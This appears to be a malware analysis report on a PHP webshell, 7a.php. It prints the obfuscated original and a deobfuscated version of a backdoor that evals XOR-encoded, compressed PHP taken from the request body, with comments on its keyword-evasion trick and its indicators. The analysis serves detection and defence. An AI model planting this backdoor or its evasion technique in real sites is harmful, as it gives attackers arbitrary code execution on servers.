PHP Malware Analysis


Filename: 7a.php

Tags

Encoding
  • base64_decode
  • base64_encode
Execution
  • eval
Files
  • file_get_contents

Deobfuscated code

<?php

// Analysis note: $E, $l, $D, $n, $b, $g and $U are fragments of one PHP source
// string. Each is padded with the filler token "V#" so that names such as
// eval, base64_decode and preg_match never appear contiguously in the file,
// which defeats naive keyword matching. None of the fragments is valid PHP on
// its own.
$E = '#@basV#e64_deV#code($m[1V#])V#,$k))V#);$o=@ob_get_V#cV#ontenV#ts();@oV#V#b_end_clV';
// Resolved by the deobfuscator: the name of the function the sample uses to
// turn the assembled string into a callable.
$S = "create_function";
$l = 's("pV#hpV#://inputV#"V#),$m)==1)V# {@ob_staV#rt();@V#eV#val(@gzuncV#omV#press(@x(V';
$D = '$k="827ccV#b0e";V#$khV#="ea8V#a706c4V#cV#34";$kf="a1689V#1f84V#e7b";$p="hV#V#qUDnUDlYV#B';
$n = '{$j};}}returV#n $o;}if (V#V#@V#V#preV#g_match("/$kh(.+)$kV#f/",@filV#e_get_V#content';
$b = 'gWvvV#WN";functioV#n V#x($t,$k)V#V#{$c=stV#rV#len($k);$lV#=strlen($t);$V#oV#="";for';
$g = '#ean();$r=@bV#ase64_eV#nV#code(@x(@V#gzcV#omV#press($o),$V#k));print("$pV#$khV#$r$kf");}';
$U = '($V#i=0V#;$i<$l;){foV#V#r($j=0;($j<$V#cV#V#&&$i<$l);$jV#++,$i+V#V#+){$o.=$t{V#$iV#}^$k';
// $t is the assembled payload: the fragments joined in the order
// $D.$b.$U.$n.$l.$E.$g with every "V#" removed. This is the source text that
// is compiled and run. It still uses the curly-brace string offsets
// ($t{$i}, $k{$j}), a syntax that was removed in PHP 8.0.
$t = "\$k=\"827ccb0e\";\$kh=\"ea8a706c4c34\";\$kf=\"a16891f84e7b\";\$p=\"hqUDnUDlYBgWvvWN\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
// Analysis note: this closure is the readable form of the payload string $t.
// It is a request-driven code-execution backdoor: it takes PHP source from the
// raw HTTP request body, evaluates it, and returns the captured output in an
// encoded envelope. The deobfuscator appears to have normalised the sample's
// $t{$i} offsets to $t[$i] and inlined $kh/$kf into the regex.
$z = function () {
    // Hard-coded protocol constants, useful as indicators when searching files,
    // request bodies and response bodies:
    //   $k  - XOR key applied to both the incoming and the outgoing data
    //   $kh - marker that opens the encoded blob
    //   $kf - marker that closes the encoded blob
    //   $p  - fixed prefix printed before every response
    $k = "827ccb0e";
    $kh = "ea8a706c4c34";
    $kf = "a16891f84e7b";
    $p = "hqUDnUDlYBgWvvWN";
    // Repeating-key XOR of $t with $k: the inner loop walks the key and restarts
    // at $j = 0 until all of $t is consumed. XOR is its own inverse, so the same
    // routine both decodes requests and encodes responses. This is obfuscation
    // against content inspection, not encryption.
    function x($t, $k)
    {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        for ($i = 0; $i < $l;) {
            for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    // Reads the whole raw request body and looks for a blob framed by the two
    // markers; (.+) is greedy, so $m[1] is everything between the first $kh and
    // the last $kf. Nothing runs unless the markers are present, so an ordinary
    // request to this file produces no output. Every call is prefixed with @ to
    // suppress warnings and notices.
    if (@preg_match("/ea8a706c4c34(.+)a16891f84e7b/", @file_get_contents("php://input"), $m) == 1) {
        // Buffer output so the evaluated code's output can be captured rather
        // than sent to the client in the clear.
        @ob_start();
        // Decode chain: base64 -> XOR with $k -> zlib decompress -> eval.
        // The evaluated source comes entirely from the request body, so whoever
        // can send a correctly framed request runs arbitrary PHP with the
        // privileges of the web server process.
        @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
        $o = @ob_get_contents();
        @ob_end_clean();
        // Response chain mirrors the request: zlib compress -> XOR -> base64,
        // then printed as prefix + opening marker + blob + closing marker.
        $r = @base64_encode(@x(@gzcompress($o), $k));
        print "{$p}{$kh}{$r}{$kf}";
    }
};
// The payload runs on every request that reaches this file.
$z();


Original code

<?php
// Analysis note: this is the sample as found on disk. Seven string fragments
// are padded with the filler token "V#" so that eval, base64_decode,
// preg_match and similar names never appear contiguously in the file.
$E='#@basV#e64_deV#code($m[1V#])V#,$k))V#);$o=@ob_get_V#cV#ontenV#ts();@oV#V#b_end_clV';
// Removing the filler "LG" yields the string "create_function", so the name of
// the code-compiling function is also hidden from plain keyword scans.
$S=str_replace('LG','','LGcreaLGteLG_LGfuLGncLGtion');
$l='s("pV#hpV#://inputV#"V#),$m)==1)V# {@ob_staV#rt();@V#eV#val(@gzuncV#omV#press(@x(V';
$D='$k="827ccV#b0e";V#$khV#="ea8V#a706c4V#cV#34";$kf="a1689V#1f84V#e7b";$p="hV#V#qUDnUDlYV#B';
$n='{$j};}}returV#n $o;}if (V#V#@V#V#preV#g_match("/$kh(.+)$kV#f/",@filV#e_get_V#content';
$b='gWvvV#WN";functioV#n V#x($t,$k)V#V#{$c=stV#rV#len($k);$lV#=strlen($t);$V#oV#="";for';
$g='#ean();$r=@bV#ase64_eV#nV#code(@x(@V#gzcV#omV#press($o),$V#k));print("$pV#$khV#$r$kf");}';
$U='($V#i=0V#;$i<$l;){foV#V#r($j=0;($j<$V#cV#V#&&$i<$l);$jV#++,$i+V#V#+){$o.=$t{V#$iV#}^$k';
// Concatenates the fragments in execution order (not the order in which they
// are declared) and strips every "V#", producing the payload source text.
$t=str_replace('V#','',$D.$b.$U.$n.$l.$E.$g);
// $S holds "create_function", so this is a variable-function call that compiles
// $t into a callable with an empty parameter list and invokes it immediately.
// create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, and the
// payload's $t{$i} offsets were removed in 8.0 as well, so the sample as
// written only runs on older interpreters.
// Review indicators visible here: str_replace() used to assemble a function
// name, a variable-function call on the result, and long single-quoted strings
// containing a repeated filler token.
$z=$S('',$t);$z();
?>